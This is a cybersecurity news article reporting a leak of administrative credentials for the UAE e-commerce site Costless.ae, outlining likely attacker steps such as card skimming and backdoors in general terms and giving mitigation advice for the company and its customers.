Costless.ae Data Breach Exposes Admin Access and Risks Massive Customer Data Leak

The Costless.ae data breach represents a critical and unfolding cybersecurity crisis affecting the e-commerce platform Costless in the United Arab Emirates. Threat actors on a dark web forum have leaked what appear to be administrative access credentials for the company’s backend system. This exposure effectively grants “God mode” control over the site’s entire infrastructure and customer data.

Unlike typical data leaks that involve stolen databases sold privately, this incident involves the public release of administrative credentials or a live vulnerability path. The leak has triggered a race among attackers to seize control of Costless.ae’s backend before the company can respond. Each minute of delay increases the likelihood of complete data theft, payment skimming, and long-term compromise.

Background

Costless.ae is a UAE-based online retail platform that handles thousands of customer transactions daily. The platform stores sensitive data, including user profiles, payment information, order histories, and credentials linked to delivery and billing systems.

The leaked credentials provide direct access to the administrative endpoint of the website, which is typically restricted to internal staff. Cybercrime analysts monitoring dark web activity confirmed that the leak was posted for free as part of a “clout” campaign. The post contained references to the “admin_” endpoint, along with instructions for exploiting it. This suggests that multiple actors are now attempting to use the leaked access to control or exfiltrate data from Costless.ae.

Key Cybersecurity Insights

This incident is active and ongoing. The Costless.ae data breach is not a hypothetical risk but a live exploitation event that could escalate into a full-scale data dump within hours. Threat researchers have outlined several immediate risks that the company and its users now face.

1. Total Administrative Compromise

The leaked credentials reportedly grant administrative privileges, effectively handing attackers unrestricted access to all backend systems. This level of control enables them to modify databases, download full user records, and alter site configurations without detection.

2. Real-Time Data Theft and Payment Skimming

Attackers are expected to deploy malicious JavaScript skimmers, also known as Magecart scripts, on the Costless checkout page. These scripts capture and exfiltrate customer credit card information in real time as users complete purchases. Simultaneously, other attackers may attempt to exfiltrate the company’s full user database containing names, phone numbers, email addresses, physical addresses, and hashed passwords.

3. Persistence Through Hidden Backdoors

Once an attacker gains access to the admin system, it is common to install hidden backdoors, webshells, or secondary accounts to maintain control even after patches or password resets. Without a complete system rebuild, the company could remain unknowingly compromised for months.

4. Regulatory and Compliance Failure

The exposure of administrative access constitutes a severe breach under the UAE’s Federal Decree-Law No. 45 of 2021 on the Protection of Personal Data (PDPL). Costless.ae is legally obligated to notify both the Telecommunications and Digital Government Regulatory Authority (TDRA) and the UAE Data Protection Office. Failure to report and remediate the incident promptly could lead to major penalties, business suspension, or criminal investigation.

What Happens Next

Experts believe this is now a “race against time.” Because the access credentials were made public, multiple attackers may already be attempting to exploit them simultaneously. The next expected steps include:

• Database Dump: A full extraction of all customer records for sale on underground forums.
• Credit Card Skimmer Injection: The placement of malicious scripts on the live checkout page to capture new payment details in real time.
• Persistent Access: Creation of secret administrative accounts and hidden code to ensure continued control after the company attempts remediation.

Each of these steps can happen within hours of credential disclosure, emphasizing the urgency of immediate containment and forensic investigation.

Mitigation Strategies

For Costless.ae (The Company)

• Immediate Endpoint Shutdown: Take the administrative endpoint completely offline and restrict access to internal, whitelisted IP addresses only.
• Activate Incident Response: Assume the attacker has already accessed backend systems. Launch a full investigation with an experienced digital forensics firm to identify changes, new accounts, or hidden code.
• Credential and Key Rotation: Change all administrative passwords, database credentials, and API keys across the platform. Enforce phishing-resistant MFA using FIDO2 or hardware security tokens.
• Malware and Skimmer Scan: Conduct a deep scan of all web application files and payment pages for injected JavaScript or webshells that may be transmitting live payment data.
• Regulatory Notification: Notify TDRA and the UAE Data Protection Office in accordance with the PDPL. Document all remediation efforts and retain forensic evidence for compliance reporting.

For Costless.ae Customers

• Monitor Bank Accounts: Customers should immediately review recent transactions for unauthorized charges or anomalies.
• Be Cautious with Emails: Avoid clicking on emails or messages claiming to be from Costless.ae, especially those asking for payment verification or password resets.
• Reset Passwords: If you have an account on Costless.ae, change your password immediately and avoid reusing it on other platforms.
• Scan for Malware: Use a trusted security solution like Malwarebytes to ensure your device is not infected with malicious extensions or trojans that can capture payment data.

Broader Implications

This incident highlights a recurring pattern in modern e-commerce breaches where public leaks of admin credentials lead to immediate mass exploitation. The Costless.ae data breach underscores the importance of limiting administrative exposure and enforcing zero-trust architecture in online platforms that process financial data.

The attack also serves as a warning to regional businesses operating under the UAE PDPL. Organizations that manage sensitive customer data must ensure that administrative systems are isolated from public access and protected by strong authentication measures. Failing to do so places customer privacy and corporate survival at risk.

For ongoing updates and verified coverage of global data breaches and related cybersecurity news, follow Botcrawl’s reporting on emerging threats across the Middle East and beyond.